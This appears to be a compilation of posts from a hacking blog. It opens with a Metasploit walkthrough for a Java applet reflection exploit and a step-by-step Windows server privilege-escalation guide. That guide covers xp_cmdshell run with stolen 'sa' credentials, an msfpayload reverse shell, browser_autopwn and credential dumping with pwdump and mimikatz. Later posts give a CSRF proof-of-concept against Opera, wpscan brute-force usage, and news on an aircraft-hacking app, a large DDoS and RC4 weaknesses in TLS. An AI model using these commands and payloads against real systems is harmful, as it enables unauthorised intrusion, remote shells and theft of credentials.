Java Applet Reflection Type Confusion Remote Code Execution

Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

(1)msfconsole


(2)msf > use exploit/multi/browser/java_jre17_reflection_types

(3)msf exploit(java_jre17_reflection_types) > show payloads

(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp

(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]

(6)msf exploit(java_jre17_reflection_types) > exploit

Hacking Windows Servers - Privilege Escalation

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.

• Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
• Using meterpreter payload to get a reverse shell over the target machine.
• Using browser_autopwn. (Really...)
• Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.

If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.

You must be wondering why only "sa"?

Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.

The picture below shows the connection string containing login credentials of "sa" account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.

So, after getting the "sa" account, we can login remotely using HeidiSQL

HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-

xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.

Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

  

2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.

Using metasploit, generate a reverse shell payload binary.

For example-

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.

Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)

Now it's time to execute the payload.

If everything goes right, we will get a meterpreter session over the target machine as shown below-

We can also use php, asp or other payloads.

3. Browser Autopwn-

This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.

Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.

I think it is clear by now that what I'm trying to explain ;)

We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-

iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-

Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.

The following screenshot shows NTLM hashes from pwdump7:

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.

Following picture shows plain text passwords from mimikatz:

You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.

Happy Hacking :)

About The Author

This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. 

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera

Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS 

The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.

CSRF POC

The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.

POC

<html>
  
  <body>
    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:

Gift from Opera

As a token of appreciation, they also send me the following gifts:

Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.

Won Network Designing Competition At PROCOM 2013

I am sorry friends as i haven't been able to post as i was really busy with some pentesting projects and my research. Now a days doing more learning part than teaching part. When i came in to hacking scene 6 years before, I started with Network security, but later every thing shifted to layer 7 i.e. web. So i started researching web application security. However, a since network and web work together, we cannot completely deny the network security part.

Recently,We participated in "PROCOM 2013" on behalf of Bahria University karachi (Team name = White Tigers) along with my two friends "Mudassir" and "Zia khan" and by the grace of Almighty Allah we managed to win the competition. Procom is the largest educational event that takes place every year in Fast University, it hosts more than 40 competition including speed programming, network designing, painting etc etc.

The competition was based on 5 rounds, which would test both theoretical and practical knowledge of the students. The major advantage was that lots of questions came from network security, which b.w i have been studying for few years. The things i learned from my CCNP route course also came into play and helped me a lot. My friend mudassir did really well too, he is dong his CCIE and is very sound in networking stuff.

What's Next?

Well, I would continue my research with Network and web application security, I am also writing a book on "Advanced Ethical Hacking", which b/w i am hoping to finish it this year. However apart from that, i would also move to programming side and participate in "Speed Programming Contest" and atleast winning it once.

I would love to hear from you the suggestions on improving at speed programming, either leave a comment or mail me directly at rafayhackingarticles@gmail.com.  

Hijacking An Aircraft With An Android App

Well vulnerabilities that never going to end, or should we say vulnerabilities and new inventions walk side by side.
Recently a terrifying prospect, a hack that allows an attacker to take control of plane navigation and cockpit systems has been revealed at a security conference in Europe. An Android application called PlaneSploit that would allow remotely attack and hijack commercial aircraft. This app is developed by Hugo Teso, a researcher at security consultancy N.Runs in Germany who's also a commercial airline pilot.


He further added,"He explained that by building an exploit framework called Simon and a complimentary Android app that delivers attack messages, he could manipulate a plane's path as he saw fit."
With these vulnerabilities in mind, he used virtual planes in a lab to demonstrate his ability to hijack a plane rather than attempting to take over a real flight as that was “too dangerous and unethical.” He used ACARS to gain access to the plane’s onboard computer system and uploaded Flight Management System data.

"I expected them to have security issues but I did not expect them to be so easy to spot. I thought I would have to fight hard to get into them but it was not that difficult," Teso said.

How to Solve problem of wpscan in Backtrack 5 r3?

Wpscan is wordpress security scanner, which is pre-installed in backtrack 5 , but it`s outdated version, so when you tried to update it, you may  have face some problems. Here is solution which work for me.

cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan

gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler

bundle install

ruby ./wpscan.rb

==WPSCAN ARGUMENTS==

--update   Update to the latest revision

--url   | -u <target url>  The WordPress URL/domain to scan.

--force | -f Forces WPScan to not check if the remote site is running WordPress.

--enumerate | -e [option(s)]  Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vp       only vulnerable themes
    at       all themes (can take a long time)
  Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'vt,tt,u,vp'

--exclude-content-based '<regexp or string>'  Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
                                              You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)

--config-file | -c <config file> Use the specified config file

--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not

--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed

--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed

--proxy <[protocol://]host:port>  Supply a proxy (will override the one from conf/browser.conf.json).
                                  HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used

--proxy-auth <username:password>  Supply the proxy login credentials (will override the one from conf/browser.conf.json).

--basic-auth <username:password>  Set the HTTP Basic authentication

--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.

--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)

--username | -U <username>  Only brute force the supplied username.

--help     | -h This help screen.

--verbose  | -v Verbose output.

==WPSCAN EXAMPLES==

Do 'non-intrusive' checks...

  ruby wpscan.rb --url www.example.com

Do wordlist password brute force on enumerated users using 50 threads...

  ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the 'admin' username only...

  ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

Enumerate installed plugins...

  ruby wpscan.rb --url www.example.com --enumerate p

==WPSTOOLS ARGUMENTS==

--help    | -h   This help screen.
--Verbose | -v   Verbose output.
--update  | -u   Update to the latest revision.
--generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
--gpl  Alias for --generate_plugin_list
--check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells

==WPSTOOLS EXAMPLES==

- Generate a new 'most popular' plugin list, up to 150 pages ...
ruby wpstools.rb --generate_plugin_list 150

- Locally scan a wordpress installation for vulnerable files or shells :
ruby wpstools.rb --check-local-vulnerable-files /var/www/wordpress/

 If this solution does not work for you then try to upgrade ruby version & then process to installation.

Zeus Master turned down Israel

Recently worldwide Hackers started #OpIsrael and targeted Israeli websites, which caused massive disruption to government, academic and private sites. According to the news/Media Israel asked Algerian Hamza the happiest hacker  to intervene to save Israel from the heavy losses in exchange for his release, but he refused to help them.


Hamza who hacked sensitive sites in the U.S. and then arrested by Interpol, US authorities accuse him of hacking into private accounts in more than 217 banks and financial companies worldwide, causing millions of dollars in losses. He was arrested in Thailand when he was traveling with his family following a holiday in Malaysia en route to Cairo, Egypt.

"The arrest warrant specifically mentioned that bail is not allowed.'' The court said.

About the author

This article has been written by Fahad Awan, He is the newest author on RHA team.

Anotomy of The Largest DDOS Attack That Almost Took Down The Internet

Recently, the largest DDOS attack in the history of the internet has been noticed, According to the reports from various websites; the attack was of more than 300GB/second. It all started when Spamhaus(NON PROFIT ORGAZNIATION) that manages the spam filters for various websites blacklisted a Dutch based webhosting company Cyberbunker, Cyberbunker allows a user to host everything else than Child pornography and stuff related to terrorism. This allows an attacker to host any malicious software such as botnet. A botnet can be used for variety of purposes ranging from stealing credit card information, infecting PC's to even denial of service attacks.
In a interview with bbc, Spamhaus blamed the Cyberbunker for the ongoing attacks, they said that Cyberbunkers have joined hands with attackers to perform DDOS attacks in order to compromise the availability.


The attack was a Denial of service attacks, which is often used by attackers to compromise the availability of the website by flooding the website with huge number of packets (In most cases), The DDOS attack was aimed at the DNS servers of Spamhaus, A DNS server is responsible for the translation of an IP address to domain name, In simple words, When we are accessing any website on the internet, on the back end we are actually accessing the IP address, DNS simplifies the process.

The experts call the attack as the biggest DDOS attack in the history of the internet, Normally, when we talk about a massive DDOS attack against huge infrastructures, It ranges from
30 to 50 GB per second of traffic, however this attack was more than 300gbps per traffic. The company moved to Cloudfare(A web performance and security company) in order to protect their services from been taken down, Initially they were receiving 10GBPS of traffic, but it got even the worse the attack and the highest peak noted was around 300GBPS. However, instead of going after Spamhaus the attackers targeted Cloudfare itself, the attackers failed to knock Cloudfare servers, even after a 100GIGS of traffic, after that they targeted the bandwidth providers of Cloudfare known as "Tier2", who itself buy bandwidth from Tier1 provider. The major traffic load was carried out by Tier1, which reported more than 300GBPS of traffic, making it the largest DDOS attack ever.

Now, one might think that, how is it slowing down the internet?, it's because, this is how the internet works as internet is simply a collection of networks, Let's say, when we are connecting to google.com from Pakistan, our browser sends a http requests, the browser sends/receives a packets which are hopped across lots of routers/networks in between until they reach the Google servers. As mentioned previously Tier2 buys bandwidth from Tier1, Tier1 connects to other Tier1 providers to ensure that all the networks are connected with each other.Tier1 providers are the core of the internet, the Tier1 provider ended up suffering all the traffic. It is reported by Cloudfare that Tier1 providers for Europe were affected, as a reason of which, internet slowdown was noticed for people surfing the internet in those areas. However, In Pakistan, the severity was very low, therefore major slow down was not noticed.

Lots of Pakistani websites are hosted abroad, the following is the list of them:

www.pakistan.gov.pk(Main Pakistan Government Portal)
www.infopak.gov.pk(Ministry of Information and Broadcasting)
www.interior.gov.pk(Ministry of Interior)
www.e-government.gov.pk(E Government Directorate)
www.pta.gov.pk(Pakistan Telecom Authority)
www.pc.gov.pk(Planning Commission)
www.sindh.gov.pk(Government of Sindh)

As as result of the outage they are suffering the outage and lots of Pakistani users are not able to access the websites, If we host these servers in Pakistan, Initially the attack would be mitigated, however it would raise a lot of security concerns, Since Pakistani servers would be more easy for attackers to compromise and knock them off, due to poor security and patch management. Also, I don't see any of the protection against DOS attacks; perhaps if they could acquire Cloudfare protection services, the DOS attacks would be mitigated easily.

HTTPS Cracked! SSL/TLS Attacked And Exploited

People who blog about ethical hacking have a very sincere relationship with Cryptographers. They (the Cryptographers) keep bringing in something delightful into the everyday nonsense and we blabber about their accomplishments until its squishy and old - this love goes far beyond then can be comprehended by normal folk. No offence.
It seems like they have swept us off our feet again and this time around, they are flaunting the big guns. Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS. Transport Layer Security didn't face a major blow during the attack as it requires to capture millions and billions of connections consisting of the same plaintext. But this highlights a major issue present in using the RC4 encryption algorithm.

RC4 uses the same key for encryption and decryption, whereas TLS uses a public/private key pair for encryption and decryption which makes it lag therefore it uses a hybrid approach. TLS connection can be setup using public/private key pairs and once established can share encrypted data over a secure network that uses ciphers for encrypting data such as AES, DES, Triple-DES, Blowfish, RC4, etc.

RC4 has been advised against many times in the past but its also a fact that it brings in half of all TLS traffic. So, the attack was done on a part of TLS by AlFardan-Bernstein-Paterson-Poettering-Schuldt (AIFBPPS).

According to NakedSophos team;

RC4 is a stream cipher, so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext.
To decrypt the ciphertext, you initialise RC4 with the same key, and XOR the ciphertext with the same stream of cipher bytes. XORing twice with the same value "cancels out", because k XOR k = 0, and because p XOR 0 = p.

RC4 generates a statistically anomalous output initially in each stream of cipher bytes. Therefore it is not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that during the second output byte the value zero turned up twice as often as it should; 256 keys on average to be precise with a probability of 1/128. This resulted in WEP being attacked which was then replaced by WPA.

AIFBPPS have taken this attack further than anyone else "producing statistical tables for the probability of every output byte (0.255) for each of the first 256 output positions in an RC4 cipher stream, for a total of 65535 (256x256) measurements."

According to NakedSophos team;

By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way.
The probability tables for a few of the output positions (which are numbered from 1 to 256) are show below.
The authors realised that if you could produce TLS connections over and over again that contained the the same data at a known offset inside the first 256 bytes (for example an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.

Here's a brief description of how it works by NakedSophos team:

"Imagine that you know that the 48th plaintext byte, P₄₈, is always the same, but not what it is.

You provoke millions of TLS connections containing that fixed-but-unknown P₄₈; in each connection, which will be using a randomly-chosen session key, P₄₈ will end up encrypted with a pseudo-random cipher byte, K₄₈, to give a pseudo-random ciphertext byte, C₄₈.

And you sniff the network traffic so you capture millions of different samples of C₄₈.

Now imagine that one value for C₄₈ shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C₄₈ as C'.

From the probability table for K₄₈ above, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K₄₈ takes the value 208 more than 1% too often.

In other words, C' must be P XOR 208, so that P must be C' XOR 208, and you have recovered the 48th byte of plaintext.

The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions.

AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary:

"However, given the huge number of TLS sessions required, The Register's provocative URL theregister.co.uk/tls_broken might be going a bit far.

Initiating 2³² (4 billion), or even 2²⁸ (260 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie is unlikely to be a practicable attack any time soon.

If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections.

On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative.

If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use, and your web servers to accept.

Go for AES-GCM instead.

GCM, or Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too."

Cheers!

About the Author:

This Article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.